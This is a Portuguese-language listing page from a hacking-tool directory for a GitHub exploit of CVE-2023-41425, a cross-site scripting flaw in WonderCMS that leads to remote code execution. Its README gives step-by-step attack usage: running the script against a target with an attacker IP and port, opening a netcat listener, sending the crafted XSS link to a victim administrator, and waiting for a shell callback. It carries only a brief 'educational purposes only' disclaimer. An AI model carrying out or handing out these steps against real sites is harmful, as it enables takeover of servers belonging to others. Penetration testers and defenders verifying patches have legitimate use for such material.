Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-41425-wonderCMS_RCE — CVE-2023-41425 - Vulnerabilidade de Cross Site Scripting no Wonder CMS v.3.2.0 até v.3.4.2 permite que um atacante remoto execute código arbitrário por meio de um script malicioso enviado ao componente installModule. | Kitploit
Ferramentas/GitHubGitHub/thefizzyfish/cve-2023-41425-wondercms_rce
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubthefizzyfish/cve-2023-41425-wondercms_rce

CVE-2023-41425-wonderCMS_RCE

CVE-2023-41425 - Vulnerabilidade de Cross Site Scripting no Wonder CMS v.3.2.0 até v.3.4.2 permite que um atacante remoto execute código arbitrário por meio de um script malicioso enviado ao componente installModule.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
2há 1 anoAinda não revisado

CVE-2023-41425-wonderCMS_RCE

A vulnerabilidade de Cross Site Scripting no Wonder CMS v.3.2.0 até v.3.4.2 permite que um atacante remoto execute código arbitrário por meio de um script especialmente criado enviado ao componente installModule. Apenas para fins educacionais

Requer conhecimento da loginURL, acesso de administrador ou a capacidade de fazer o administrador clicar no link XSS.

  1. Clone o repositório
root@kitploit:~
git clone https://github.com/thefizzyfish/CVE-2023-41425-wonderCMS_RCE.git
  1. Execute
root@kitploit:~
usage: CVE-2023-41425.py [-h] -rhost RHOST -lhost LHOST -lport LPORT -sport SPORT
python3 CVE-2023-41425.py -rhost http://example.com/loginURL -lhost 10.10.14.7 -lport 9001 -sport 8000
  1. Configure um listener local
root@kitploit:~
nc -lnvp 9001
  1. Envie a URL XSS impressa para a vítima ou, se tiver acesso de administrador, clique nela
  2. Aguarde um callback

image

Crédito

prodigiousMind por descobrir e relatar a vulnerabilidade https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413

Baixar ferramenta